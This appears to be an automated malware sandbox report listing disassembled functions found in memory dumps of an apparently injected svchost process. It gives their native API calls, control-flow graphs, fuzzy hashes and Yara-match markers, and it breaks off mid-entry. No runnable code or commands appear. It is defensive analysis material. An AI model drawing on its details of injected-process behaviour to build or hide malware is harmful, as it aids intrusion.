                  Function 029A85E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 260 29a85e0-29a8631 call 29a91e0 NtCreateFile
                  APIs
                  • NtCreateFile.NTDLL(00000060,00000000,.z`,029A3BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,029A3BB7,007A002E,00000000,00000060,00000000,00000000), ref: 029A862D
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Offset: 02990000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2990000_svchost.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateFile
                  • String ID: .z`
                  • API String ID: 823142352-1441809116
                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                  • Instruction ID: c2aaccdfbe2c4ed195784288e1d6ca0f474373aa1fe74e240300da36aea2703b
                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                  • Instruction Fuzzy Hash: 43F0BDB2204208ABCB08CF88DC94EEB77ADAF8C754F158248FA0D97240C630E811CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 029A87BA Relevance: 1.6, APIs: 1, Instructions: 56memorynativeCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02992D11,00002000,00003000,00000004), ref: 029A87F9
                  Memory Dump Source
                  • Source File: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Offset: 02990000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2990000_svchost.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateMemoryVirtual
                  • String ID:
                  • API String ID: 2167126740-0
                  • Opcode ID: 48dc019814ad49b09635e0325ec3ae780754ed70a7d17cf36b842a994f4eb259
                  • Instruction ID: 349dc6ecf6bb223d05862ea83ebd235919f2dedd86af18ff30aa714997805836
                  • Opcode Fuzzy Hash: 48dc019814ad49b09635e0325ec3ae780754ed70a7d17cf36b842a994f4eb259
                  • Instruction Fuzzy Hash: 2E1102B6204208ABDB14DF88DC94EEB77ADAF88754F158649FE19A7241C631E911CBE0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 029A868B Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON
                  Download Yara Rule
                  APIs
                  • NtReadFile.NTDLL(029A3D72,5E972F65,FFFFFFFF,029A3A31,?,?,029A3D72,?,029A3A31,FFFFFFFF,5E972F65,029A3D72,?,00000000), ref: 029A86D5
                  Memory Dump Source
                  • Source File: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Offset: 02990000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2990000_svchost.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileRead
                  • String ID:
                  • API String ID: 2738559852-0
                  • Opcode ID: 477e0a8e7235654433e43f63c8fbe6db9c1e4cfcecc793f966644aca4fca960a
                  • Instruction ID: 7ce1280cfdc89e2b2dcd57abedc98cf5bc27d84215a3f45afcdfd4ef8398a375
                  • Opcode Fuzzy Hash: 477e0a8e7235654433e43f63c8fbe6db9c1e4cfcecc793f966644aca4fca960a
                  • Instruction Fuzzy Hash: E5F0A4B2200208ABDB14DF99DC95EEB77ADFF8C754F158248BA1DA7241D630E911CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 029A8690 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                  Download Yara Rule
                  APIs
                  • NtReadFile.NTDLL(029A3D72,5E972F65,FFFFFFFF,029A3A31,?,?,029A3D72,?,029A3A31,FFFFFFFF,5E972F65,029A3D72,?,00000000), ref: 029A86D5
                  Memory Dump Source
                  • Source File: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Offset: 02990000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2990000_svchost.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileRead
                  • String ID:
                  • API String ID: 2738559852-0
                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                  • Instruction ID: 7cbde2aadababe53a84d24a036aa553f42b863ab6f92a9ee84f881e9ae0e3bef
                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                  • Instruction Fuzzy Hash: 2EF0A4B2200208ABDB14DF89DC94EEB77ADAF8C754F158248BA1D97241D630E911CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 029A87C0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                  Download Yara Rule
                  APIs
                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02992D11,00002000,00003000,00000004), ref: 029A87F9
                  Memory Dump Source
                  • Source File: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Offset: 02990000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2990000_svchost.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateMemoryVirtual
                  • String ID:
                  • API String ID: 2167126740-0
                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                  • Instruction ID: 29f3bde75d3d24b56594b44208fcc57880a930a18060e2402c27f9d5c8f1d3de
                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                  • Instruction Fuzzy Hash: 89F015B2200208ABDB14DF89CC80EAB77ADAF88754F118148FE0897241C630F910CBE0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 029A8710 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                  Download Yara Rule
                  APIs
                  • NtClose.NTDLL(029A3D50,?,?,029A3D50,00000000,FFFFFFFF), ref: 029A8735
                  Memory Dump Source
                  • Source File: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Offset: 02990000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2990000_svchost.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close
                  • String ID:
                  • API String ID: 3535843008-0
                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                  • Instruction ID: 71fd60e5f34127b7e7166792a53dba145bb73fec743faa9dc19e9f681260fa18
                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                  • Instruction Fuzzy Hash: 26D012752003146BD710EB98CC45EA7775DEF44750F154455BA185B241C530F600C7E0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 029A870A Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                  Download Yara Rule
                  APIs
                  • NtClose.NTDLL(029A3D50,?,?,029A3D50,00000000,FFFFFFFF), ref: 029A8735
                  Memory Dump Source
                  • Source File: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Offset: 02990000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2990000_svchost.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close
                  • String ID:
                  • API String ID: 3535843008-0
                  • Opcode ID: c7b6bceb4d5ddfb77eb38e1938be744f90f11e2e645b2aa764d0019bc7b89682
                  • Instruction ID: bcd30528f0254c7bfaabf6a4eb7b00c586aec14a5285ba50c86bb555247fcb4a
                  • Opcode Fuzzy Hash: c7b6bceb4d5ddfb77eb38e1938be744f90f11e2e645b2aa764d0019bc7b89682
                  • Instruction Fuzzy Hash: 01E01275600314AFD710EBD4CC45EA77B69EF84764F154455BA186B282C570E604C7E0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 03369710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.626644529.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                  • Associated: 0000000B.00000002.626872788.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                  • Associated: 0000000B.00000002.626897109.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_3300000_svchost.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: eafd2190f740d1de6d8cb9c4df04178bbfc9304fd42abd1456c8752b91437781
                  • Instruction ID: da0d0fdff40a95b46cd5da198538217279d2c9c1e9122178299b604815be0e2d
                  • Opcode Fuzzy Hash: eafd2190f740d1de6d8cb9c4df04178bbfc9304fd42abd1456c8752b91437781
                  • Instruction Fuzzy Hash: F190027521104902E110A599544864600059BE0341F51D021A5015555EC7A988917171
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 03369780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.626644529.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                  • Associated: 0000000B.00000002.626872788.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                  • Associated: 0000000B.00000002.626897109.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_3300000_svchost.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 68596cbc36d5701013fd36cf3b73d5b40afd98cb054479563db2282748efb432
                  • Instruction ID: d701e37927c109bec25c96237d27a428c1a51337817044c1f8969ca781ffbe98
                  • Opcode Fuzzy Hash: 68596cbc36d5701013fd36cf3b73d5b40afd98cb054479563db2282748efb432
                  • Instruction Fuzzy Hash: BE90026D22304502E190B159544860A00059BD1242F91D425A0006558CCA5988696361
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 03369FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.626644529.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                  • Associated: 0000000B.00000002.626872788.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                  • Associated: 0000000B.00000002.626897109.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_3300000_svchost.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: ee6737c179cd50ddbdf8b4103b246a9f38a356c03f74b1cb3133dc2b1a9868f3
                  • Instruction ID: 5e5002767a8a6c3637724afd1e1d154168148d53352c888836b8b325c03dc306
                  • Opcode Fuzzy Hash: ee6737c179cd50ddbdf8b4103b246a9f38a356c03f74b1cb3133dc2b1a9868f3
                  • Instruction Fuzzy Hash: 8790027532118902E120A159844470600059BD1241F51C421A0815558D87D988917162
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 03369660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.626644529.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                  • Associated: 0000000B.00000002.626872788.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                  • Associated: 0000000B.00000002.626897109.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_3300000_svchost.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 709c12bdf44a5627421d10907b2899dcc062f003c6dd7ba152494a2b663f37b6
                  • Instruction ID: 7fce38b73787ad0b26bcd51b7b68cc8ebf3fc9d18b0443625bfcc6ecc0f0a72b
                  • Opcode Fuzzy Hash: 709c12bdf44a5627421d10907b2899dcc062f003c6dd7ba152494a2b663f37b6
                  • Instruction Fuzzy Hash: DC90027521104D02E190B159444464A00059BD1341F91C025A0016654DCB598A5977E1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 03369650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.626644529.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                  • Associated: 0000000B.00000002.626872788.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                  • Associated: 0000000B.00000002.626897109.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_3300000_svchost.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 7a486a098a9cb238ce737db90086e42106ab030d89e39155311236a91b52fcb5
                  • Instruction ID: 04397e40828c19f348513e5b8cbb2a913de6879def685d040b92fa6b97ada45c
                  • Opcode Fuzzy Hash: 7a486a098a9cb238ce737db90086e42106ab030d89e39155311236a91b52fcb5
                  • Instruction Fuzzy Hash: CA90027521508D42E150B1594444A4600159BD0345F51C021A0055694D97698D55B6A1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 03369A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.626644529.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                  • Associated: 0000000B.00000002.626872788.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                  • Associated: 0000000B.00000002.626897109.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_3300000_svchost.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: fff69f6fa539cff5d0feebae5604254c532e45b6e9348d0936efa520bb9726c8
                  • Instruction ID: a65b74df553915a48cfebfafd67ea16ea8e8ea2fb8919ea23b0c8262757383b1
                  • Opcode Fuzzy Hash: fff69f6fa539cff5d0feebae5604254c532e45b6e9348d0936efa520bb9726c8
                  • Instruction Fuzzy Hash: D390026522184542E210A5694C54B0700059BD0343F51C125A0145554CCA5988616561
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 033696E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.626644529.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                  • Associated: 0000000B.00000002.626872788.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                  • Associated: 0000000B.00000002.626897109.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_3300000_svchost.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 55394d89da26d6b048e47e44b938f1e4c09f3b2d542679167cd88bc5177096b6
                  • Instruction ID: 4ef5c320124e93670b5e5dfe03651aeef8c47e06637cace7cb5fa95d75397690
                  • Opcode Fuzzy Hash: 55394d89da26d6b048e47e44b938f1e4c09f3b2d542679167cd88bc5177096b6
                  • Instruction Fuzzy Hash: 259002752110CD02E120A159844474A00059BD0341F55C421A4415658D87D988917161
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 033696D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.626644529.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                  • Associated: 0000000B.00000002.626872788.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                  • Associated: 0000000B.00000002.626897109.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_3300000_svchost.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: ab2c21ca3e8abd730b7ba419f1bd695bede07637e4c3ab78cbd838b6b77abf7b
                  • Instruction ID: 74a998b731eef175871c2e264360c97644abc4e36d97bac2dae4c163ae7a4f2f
                  • Opcode Fuzzy Hash: ab2c21ca3e8abd730b7ba419f1bd695bede07637e4c3ab78cbd838b6b77abf7b
                  • Instruction Fuzzy Hash: 2F90027521104D42E110A1594444B4600059BE0341F51C026A0115654D8759C8517561
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 03369910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.626644529.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                  • Associated: 0000000B.00000002.626872788.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                  • Associated: 0000000B.00000002.626897109.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_3300000_svchost.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 773c299fd45c59546582445f156cb5b341ad7355d8584eb65a8236abea791e37
                  • Instruction ID: 65a846633c44f580f4b8aeda02402b27b55e0fb66534410f0b694a60eb855fa4
                  • Opcode Fuzzy Hash: 773c299fd45c59546582445f156cb5b341ad7355d8584eb65a8236abea791e37
                  • Instruction Fuzzy Hash: E19002B521104902E150B159444474600059BD0341F51C021A5055554E879D8DD576A5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 03369540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.626644529.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                  • Associated: 0000000B.00000002.626872788.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                  • Associated: 0000000B.00000002.626897109.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_3300000_svchost.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 7366cf7b1bb06460e63ca4c667440a68f9e6c7a7a6586fe61edf99844569f787
                  • Instruction ID: 3aec7d1f6abad5f1a9a4890b25696416d76de7a4f6ebfceadbdba06174279ce4
                  • Opcode Fuzzy Hash: 7366cf7b1bb06460e63ca4c667440a68f9e6c7a7a6586fe61edf99844569f787
                  • Instruction Fuzzy Hash: CC90047D331045031115F55D07445070047DFD53D1351C031F1007550CD775CC717171
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 033699A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.626644529.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                  • Associated: 0000000B.00000002.626872788.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                  • Associated: 0000000B.00000002.626897109.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_3300000_svchost.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 2259bcd1cbe0cf87c2746fbb0de42540321ff7203be6b278b77e9f767568869e
                  • Instruction ID: bbef85932221fb65e86215c85bc4bb808809b7fcb5ed10fe583bcfd3b72f9879
                  • Opcode Fuzzy Hash: 2259bcd1cbe0cf87c2746fbb0de42540321ff7203be6b278b77e9f767568869e
                  • Instruction Fuzzy Hash: 5E9002A535104942E110A1594454B060005DBE1341F51C025E1055554D875DCC527166
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 033695D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.626644529.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                  • Associated: 0000000B.00000002.626872788.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                  • Associated: 0000000B.00000002.626897109.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_3300000_svchost.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 45b0e5102c754e550ff6c113c0d64c767260180ac76106c70657cdbeffc0da12
                  • Instruction ID: 5488dc7b1e991147ea6c8245c5b0f86d3cda5f52765ff0f95cc2d8b91d41c840
                  • Opcode Fuzzy Hash: 45b0e5102c754e550ff6c113c0d64c767260180ac76106c70657cdbeffc0da12
                  • Instruction Fuzzy Hash: 9E9002A5212045035115B1594454616400A9BE0241B51C031E1005590DC66988917165
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 03369860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.626644529.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                  • Associated: 0000000B.00000002.626872788.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                  • Associated: 0000000B.00000002.626897109.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_3300000_svchost.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 9b3bc06bfcc719c8c276e5e47d44e391de3e9f1e586d15c119deb7577d216194
                  • Instruction ID: 5e9e99d9a43ef368fa1b35471b4d7a186465afce851d758ba3f2bc9f7f02001a
                  • Opcode Fuzzy Hash: 9b3bc06bfcc719c8c276e5e47d44e391de3e9f1e586d15c119deb7577d216194
                  • Instruction Fuzzy Hash: EC90027521104913E121A159454470700099BD0281F91C422A0415558D979A8952B161
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 03369840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.626644529.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                  • Associated: 0000000B.00000002.626872788.000000000341B000.00000040.00000800.00020000.00000000.sdmpDownload File
                  • Associated: 0000000B.00000002.626897109.000000000341F000.00000040.00000800.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_3300000_svchost.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: b767f2040277ba61be8a731cc75f1a6f995705f1423bc1d6518ac823d74f3dc4
                  • Instruction ID: 119d2ce9d1b5a0ae70750a54c4122c4947935ac39cb4ead079cb0f9caca9a30e
                  • Opcode Fuzzy Hash: b767f2040277ba61be8a731cc75f1a6f995705f1423bc1d6518ac823d74f3dc4
                  • Instruction Fuzzy Hash: F4900265252086526555F15944445074006ABE0281791C022A1405950C866A9856E661
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 029A7300 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 220 29a7300-29a732f 221 29a733b-29a7342 220->221 222 29a7336 call 29aa020 220->222 223 29a7348-29a7398 call 29aa0f0 call 2999b40 call 29a3e50 221->223 224 29a741c-29a7422 221->224 222->221 231 29a73a0-29a73b1 Sleep 223->231 232 29a73b3-29a73b9 231->232 233 29a7416-29a741a 231->233 234 29a73bb-29a73e1 call 29a6f30 232->234 235 29a73e3-29a7403 232->235 233->224 233->231 236 29a7409-29a740c 234->236 235->236 237 29a7404 call 29a7130 235->237 236->233 237->236
                  APIs
                  • Sleep.KERNELBASE(000007D0), ref: 029A73A8
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Offset: 02990000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2990000_svchost.jbxd
                  Yara matches
                  Similarity
                  • API ID: Sleep
                  • String ID: net.dll$wininet.dll
                  • API String ID: 3472027048-1269752229
                  • Opcode ID: 7175d68f425cbd9734874dc9a5e6ae5959c804b1f03efe41631106d50f2d7c85
                  • Instruction ID: d0ff47bb1be1af308610bb18d20dc3f96fd0bf561ebe5f4361cd9fecfc18ef1e
                  • Opcode Fuzzy Hash: 7175d68f425cbd9734874dc9a5e6ae5959c804b1f03efe41631106d50f2d7c85
                  • Instruction Fuzzy Hash: 56316CB6601700ABD715EFA8D8B1FABB7F9AF88700F04851DFA195B241D731A546CBE0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 029A72F6 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 240 29a72f6-29a7342 call 29aa020 243 29a7348-29a7398 call 29aa0f0 call 2999b40 call 29a3e50 240->243 244 29a741c-29a7422 240->244 251 29a73a0-29a73b1 Sleep 243->251 252 29a73b3-29a73b9 251->252 253 29a7416-29a741a 251->253 254 29a73bb-29a73e1 call 29a6f30 252->254 255 29a73e3-29a7403 252->255 253->244 253->251 256 29a7409-29a740c 254->256 255->256 257 29a7404 call 29a7130 255->257 256->253 257->256
                  APIs
                  • Sleep.KERNELBASE(000007D0), ref: 029A73A8
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Offset: 02990000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2990000_svchost.jbxd
                  Yara matches
                  Similarity
                  • API ID: Sleep
                  • String ID: net.dll$wininet.dll
                  • API String ID: 3472027048-1269752229
                  • Opcode ID: 1c0d00e7fb460646513540fd192f642f3900a032ba50aeee1d67cbd671abc40a
                  • Instruction ID: e6a90932ff280c329b9b8de3e5ce6fad36499e4223b6d53c0d7368fc03836dcd
                  • Opcode Fuzzy Hash: 1c0d00e7fb460646513540fd192f642f3900a032ba50aeee1d67cbd671abc40a
                  • Instruction Fuzzy Hash: 5431A0B6901701ABD715EFA4C8A1BABB7B9AF88700F04816DFA195B241D771A445CBE0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 029A88E3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 263 29a88e3-29a8906 264 29a890c-29a8921 RtlFreeHeap 263->264 265 29a8907 call 29a91e0 263->265 265->264
                  APIs
                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02993B93), ref: 029A891D
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Offset: 02990000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2990000_svchost.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeHeap
                  • String ID: .z`
                  • API String ID: 3298025750-1441809116
                  • Opcode ID: 58688c48e28175994d0f1b7cedc720750a00f590fab8f23d532b392079e3a505
                  • Instruction ID: 8c8bad101d6bf28d1d54f8f0224f79a8cfe352cafb5d737f20ebb7557b84edc2
                  • Opcode Fuzzy Hash: 58688c48e28175994d0f1b7cedc720750a00f590fab8f23d532b392079e3a505
                  • Instruction Fuzzy Hash: 27E0EDB1200224AFD724CF68DC48FE77B69EF88360F004689FD489B281C631E901CBE0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 029A88F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 266 29a88f0-29a8921 call 29a91e0 RtlFreeHeap
                  APIs
                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02993B93), ref: 029A891D
                  Strings
                  Memory Dump Source
